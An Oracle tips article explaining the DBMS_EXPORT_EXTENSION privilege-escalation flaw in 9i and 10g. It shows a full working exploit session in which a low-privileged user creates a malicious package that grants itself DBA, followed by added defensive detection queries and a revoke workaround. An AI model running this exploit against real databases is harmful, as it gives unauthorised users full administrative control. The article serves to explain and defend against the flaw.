Oracle exploit vulnerability allows privilege escalation
Oracle Tips by Mike Ault
This Oracle privilege vulnerability was announced with nationwide fanfare, including major alerts from Symantec and CERT, and there has been alarm over the release of sample attack code.
This exploit code was published Wednesday, only a day after Oracle released its quarterly Critical Patch Update, security provider Symantec noted.
This vulnerability applies only to internal databases, since you must possess a valid Oracle user ID in order to perform this exploit. Because you must have an Oracle ID, this exploit is not a threat for attacks over the web.
This example shows the Oracle exploit running against 9iR2; it works there just as it does in 10gR1 and 10gR2, so here it is, just to demonstrate:
-- Login as SYSTEM
SQL> connect system/password
Connected.
-- now let's create our HACKER user with "minimal privileges"
SQL> create user hacker identified
by hacker;
User created.
SQL> grant create session, create procedure to hacker;
Grant succeeded.
-- Let's connect and do the deed...
SQL> connect hacker/hacker
Connected.
SQL> CREATE OR REPLACE
2 PACKAGE MYBADPACKAGE AUTHID CURRENT_USER
3 IS
4 FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
5 VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
6 RETURN NUMBER;
7 END;
8 /
Package created.
SQL> CREATE OR REPLACE PACKAGE BODY MYBADPACKAGE
2 IS
3 FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
4 VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
5 RETURN NUMBER
6 IS
7 pragma autonomous_transaction;
8 BEGIN
9 EXECUTE IMMEDIATE 'GRANT DBA TO HACKER';
10 COMMIT;
11 RETURN(1);
12 END;
13
14 END;
15 /
Package body created.
SQL> DECLARE
2 INDEX_NAME VARCHAR2(200);
3 INDEX_SCHEMA VARCHAR2(200);
4 TYPE_NAME VARCHAR2(200);
5 TYPE_SCHEMA VARCHAR2(200);
6 VERSION VARCHAR2(200);
7 NEWBLOCK PLS_INTEGER;
8 GMFLAGS NUMBER;
9 v_Return VARCHAR2(200);
10 BEGIN
11 INDEX_NAME := 'A1'; INDEX_SCHEMA := 'HACKER';
12 TYPE_NAME := 'MYBADPACKAGE'; TYPE_SCHEMA := 'HACKER';
13 VERSION := '10.2.0.2.0'; GMFLAGS := 1;
14
15 v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(
16 INDEX_NAME => INDEX_NAME, INDEX_SCHEMA => INDEX_SCHEMA, TYPE_NAME
17 => TYPE_NAME,
18 TYPE_SCHEMA => TYPE_SCHEMA, VERSION => VERSION, NEWBLOCK =>
19 NEWBLOCK, GMFLAGS => GMFLAGS
20 );
21 END;
22 /
PL/SQL procedure successfully completed.
-- We don't have DBA yet; the grant only takes effect once we log on again
SQL> select * from v$instance;
select * from v$instance
*
ERROR at line 1:
ORA-00942: table or view does not exist
-- now re-logon to pick up the grant
SQL> connect hacker/hacker
Connected.
SQL> /
INSTANCE_NUMBER INSTANCE_NAME
--------------- ----------------
HOST_NAME
----------------------------------------------------------------
VERSION STARTUP_T STATUS PAR THREAD# ARCHIVE
LOG_SWITCH_
----------------- --------- ------------ --- ---------- -------
-----------
LOGINS SHU DATABASE_STATUS INSTANCE_ROLE ACTIVE_ST
---------- --- ----------------- ------------------ ---------
1 aultdb2
MRALAPTOP2
9.2.0.5.0 17-APR-06 OPEN NO 1 STARTED
ALLOWED NO ACTIVE PRIMARY_INSTANCE NORMAL
SQL>
Scared yet?
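A defender's set of checks for this issue, added here and not part of Mike Ault's original post: run them as a DBA on a database you administer; they assume only the standard data-dictionary views (DBA_TAB_PRIVS, DBA_SOURCE, DBA_ROLE_PRIVS) and no patch level in particular.

```sql
-- Added defensive checks (not from the original post). Run as a DBA.

-- 1. Who can call DBMS_EXPORT_EXTENSION at all? On unpatched releases PUBLIC
--    typically holds EXECUTE, which is what lets a user with nothing more than
--    CREATE SESSION and CREATE PROCEDURE reach the vulnerable entry point.
SELECT grantee, privilege, grantable
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name = 'DBMS_EXPORT_EXTENSION';

-- 2. Packages outside the Oracle-supplied schemas that declare an
--    ODCIIndexGetMetadata function. The session above relies on exactly such a
--    package; legitimate data-cartridge owners (CTXSYS, MDSYS, ...) will also
--    match, so review hits against the list of schemas you expect.
SELECT DISTINCT owner, name, type
  FROM dba_source
 WHERE owner NOT IN ('SYS', 'SYSTEM')
   AND UPPER(text) LIKE '%ODCIINDEXGETMETADATA%';

-- 3. User-written source that hands out DBA dynamically.
SELECT owner, name, type, line, text
  FROM dba_source
 WHERE owner NOT IN ('SYS', 'SYSTEM')
   AND UPPER(text) LIKE '%GRANT%DBA%';

-- 4. Current holders of DBA. Compare against your approved list; the HACKER
--    account from the session above would show up here after the exploit ran.
SELECT grantee, admin_option
  FROM dba_role_privs
 WHERE granted_role = 'DBA'
 ORDER BY grantee;

-- Interim hardening while the Critical Patch Update is being applied
-- (assumption: this matches the commonly recommended workaround for the
-- unpatched case; test first, because export tooling may depend on it):
-- REVOKE EXECUTE ON sys.dbms_export_extension FROM PUBLIC;
```

Check 1 tells you whether the precondition exists at all; checks 2 to 4 tell you whether someone has already used it.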